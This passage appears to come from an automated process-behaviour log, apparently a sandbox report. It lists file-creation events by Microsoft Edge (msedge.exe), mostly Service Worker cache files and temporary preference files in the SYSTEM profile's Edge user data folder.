    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\984b0eb72c6da64b_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\314559faefde062a_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\314559faefde062a_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\0cfe2fc50d18595c_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\0cfe2fc50d18595c_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\192386fd3846067f_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\192386fd3846067f_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\fbfc2d62749078d1_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\fbfc2d62749078d1_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\dfd4ad20f3e95164_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\dfd4ad20f3e95164_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\d1c87e07019d8b4e_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\d1c87e07019d8b4e_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\f7b67dad731ab807_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\f7b67dad731ab807_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\16f4e821b507362b_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\16f4e821b507362b_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\0b17bb7e9cf5a436_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\0b17bb7e9cf5a436_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\0f0839cc28cc3d3e_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\0f0839cc28cc3d3e_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\b5b383720128fe63_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\b5b383720128fe63_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\ec37128008082892_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\ec37128008082892_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\ee51d1c28e826730_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\ee51d1c28e826730_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\96e189d62afbdb94_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\96e189d62afbdb94_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\57e38f4d6de24451_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\57e38f4d6de24451_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\6389b23f4bc62c06_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\6389b23f4bc62c06_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\23a857e3f0a12e9b_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\23a857e3f0a12e9b_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\819f3848762bde15_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\819f3848762bde15_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\b2ea075a80b7dff9_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\b2ea075a80b7dff9_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\773ec66002a68baf_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\773ec66002a68baf_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\3d49f14d5d581ae5_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\3d49f14d5d581ae5_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\4c7155fdcb357b2c_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\4c7155fdcb357b2c_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\0b596ddd81a3e04f_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\0b596ddd81a3e04f_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\ce9a2becd154cc0b_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\ce9a2becd154cc0b_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\0e1587ceb49a87ad_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\0e1587ceb49a87ad_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\4086ead4c1270361_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\4086ead4c1270361_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\41ac4588896d4c6f_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\41ac4588896d4c6f_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\a0aa60a133aba17b_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\a0aa60a133aba17b_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\2733b1fa30133dc5_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\2733b1fa30133dc5_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\1e07c40510c25b09_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\1e07c40510c25b09_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\0804dd4bedc4044a_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\0804dd4bedc4044a_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\008aecfeca5856cb_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\008aecfeca5856cb_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\62741acbd610245a_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\62741acbd610245a_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\05299b87d8a10088_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\05299b87d8a10088_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\f0ce427b28da7d25_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\34d467f947acad13_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\aae27d8c-0c0e-4371-928a-b2d2faa2a2fa.tmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Local State~RF1fb82d.TMP
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\872b7b4f8bfb485b_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\f7a02825bf690a95_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\65f701fc2d3b6d77_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\6c9220cc-d203-41ca-ad88-6712ed1838ea.tmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF1fbdea.TMP
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\960aaafa77fbb8a0_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\b851f156-c129-4d54-982c-e18bbd14889f.tmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF1fbe86.TMP
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\b849a2f19789767a_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\67f1189172319be9_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\e6504c209cb882d7_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\df9f3044c9ae2e2e_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\3055e34b33d94a7f_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\ea6f02895a4e3500_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\7c4863577c43b32f_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\574b540795aeca12_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\9edf5f432f2b01a8_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\2a15b98971354678_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\0a67355f432340b9_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\b9dcc9f4c807eeaa_0
